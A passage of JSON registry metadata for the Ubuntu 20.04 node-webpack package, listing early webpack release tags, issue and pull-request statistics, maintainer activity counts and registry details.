a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-25T07:10:53.897Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/node-webpack?arch=source\u0026distro=ubuntu-20.04\u0026repository_url=https://launchpad.net/ubuntu/focal","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubuntu/node-webpack","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/ubuntu/node-webpack","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/ubuntu/node-webpack/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-25T00:09:16.443Z","issues_count":10163,"pull_requests_count":9423,"avg_time_to_close_issue":10850741.648681419,"avg_time_to_close_pull_request":2749833.8614084506,"issues_closed_count":9897,"pull_requests_closed_count":8875,"pull_request_authors_count":1444,"issue_authors_count":6684,"avg_comments_per_issue":5.834399291547771,"avg_comments_per_pull_request":3.1735116205030245,"merged_pull_requests_count":6013,"bot_issues_count":8,"bot_pull_requests_count":2910,"past_year_issues_count":81,"past_year_pull_requests_count":929,"past_year_avg_time_to_close_issue":883737.0535714285,"past_year_avg_time_to_close_pull_request":363177.9151846785,"past_year_issues_closed_count":56,"past_year_pull_requests_closed_count":731,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":63,"past_year_avg_comments_per_issue":3.3950617283950617,"past_year_avg_comments_per_pull_request":4.806243272335845,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":139,"past_year_merged_pull_requests_count":578,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1070,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":111,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":31,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/joshwiens"},{"login":"jeremenichelli","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jeremenichelli"},{"login":"reergymerej","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/reergymerej"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"MrKou47","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/MrKou47"},{"login":"aboktor","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aboktor"},{"login":"mikegreiling","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mikegreiling"},{"login":"mattlewis92","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mattlewis92"},{"login":"eemeli","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/eemeli"},{"login":"pranshuchittora","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pranshuchittora"},{"login":"3ru","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/3ru"},{"login":"ryanclark","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ryanclark"},{"login":"sapegin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sapegin"},{"login":"loveky","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/loveky"},{"login":"edocipriano","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edocipriano"},{"login":"PatrickJS","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/PatrickJS"},{"login":"jevancc","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jevancc"},{"login":"chrisdothtml","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chrisdothtml"},{"login":"anshumanv","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anshumanv"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"}],"active_maintainers":[{"login":"alexander-akait","count":430,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"hai-x","count":87,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":53,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"evenstensberg","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"UlisesGascon","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/UlisesGascon"},{"login":"ovflowd","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages/node-webpack/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages/node-webpack/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages/node-webpack/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages/node-webpack/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages/node-webpack/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages/node-webpack/codemeta","maintainers":[],"registry":{"name":"ubuntu-20.04","url":"https://launchpad.net/ubuntu/focal","ecosystem":"ubuntu","default":false,"packages_count":30789,"maintainers_count":0,"namespaces_count":4,"keywords_count":1425,"github":"ubuntu","metadata":{"codename":"focal","funded_packages_count":824},"icon_url":"https://github.com/ubuntu.png","created_at":"2026-02-04T11:01:47.233Z","updated_at":"2026-09-02T05:06:14.277Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/ubuntu-20.04/namespaces"}}]